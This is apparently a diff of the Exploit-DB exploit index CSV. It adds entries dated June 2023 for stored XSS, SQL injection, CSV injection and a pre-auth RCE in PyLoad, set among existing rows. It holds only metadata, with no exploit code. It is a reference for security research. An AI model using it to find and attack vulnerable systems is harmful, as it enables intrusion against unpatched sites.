 33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
@@ -23467,6 +23470,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80,2015-09-11,2015-09-11,0,OSVDB-127474;OSVDB-127473,,,,http://www.exploit-db.comMonsta-FTP-master.zip,
 27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1781;OSVDB-24650,,,,,https://www.securityfocus.com/bid/17546/info
 3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php,,2007-03-19,2016-09-29,1,CVE-2006-1781,,,,,
+51519,exploits/php/webapps/51519.txt,"Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,,2013-09-20,2018-03-01,1,OSVDB-97526,,,,,https://www.securityfocus.com/bid/62572/info
 37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,,2012-08-23,2018-03-01,1,OSVDB-84839,,,,,https://www.securityfocus.com/bid/55171/info
 39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80,2016-03-28,2016-03-28,0,,,,,http://www.exploit-db.commonstra-3.0.3.zip,
@@ -24760,6 +24764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,,
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,,
 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,,
+51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,,
 50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,,
@@ -28102,8 +28107,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
+51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
@@ -30490,6 +30497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,,2021-06-10,2021-06-10,0,,,,,http://www.exploit-db.comtextpattern-4.8.7.zip,
 49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
+51523,exploits/php/webapps/51523.txt,"Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php,,2006-12-19,,1,OSVDB-32381;CVE-2006-6686,,,,,
 25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php,,2005-07-18,2013-06-07,1,,,,,,https://www.securityfocus.com/bid/14303/info
 1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php,,2006-03-24,2016-06-30,1,OSVDB-24164;CVE-2006-1412,,,,http://www.exploit-db.comtftgallery-0.10.zip,
@@ -33991,6 +33999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43827,exploits/php/webapps/43827.txt,"XOOPS < 2.0.11 - Multiple Vulnerabilities",2015-06-29,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00079;CVE-2005-2112;CVE-2005-2113,,,,,http://gulftech.org/advisories/XOOPS%20Multiple%20Vulnerabilities/79
 9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php,,2009-07-23,,1,OSVDB-56598;CVE-2009-4714;OSVDB-56597;CVE-2009-4713;OSVDB-56596;OSVDB-56595;CVE-2009-4698;OSVDB-56594;OSVDB-56593,,,,,
 9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php,,2009-07-26,2016-10-27,1,CVE-2009-4698;OSVDB-56595;OSVDB-56594;OSVDB-56593,,,,,
+51520,exploits/php/webapps/51520.txt,"Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php,,2012-06-12,2015-06-26,1,,,,,,https://www.securityfocus.com/bid/53945/info
 3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php,,2007-05-03,,1,OSVDB-34472;CVE-2007-2543,,,,,
 39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,CVE-2014-3935;OSVDB-107104,,,,,https://www.securityfocus.com/bid/67460/info
@@ -34516,6 +34525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
+51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,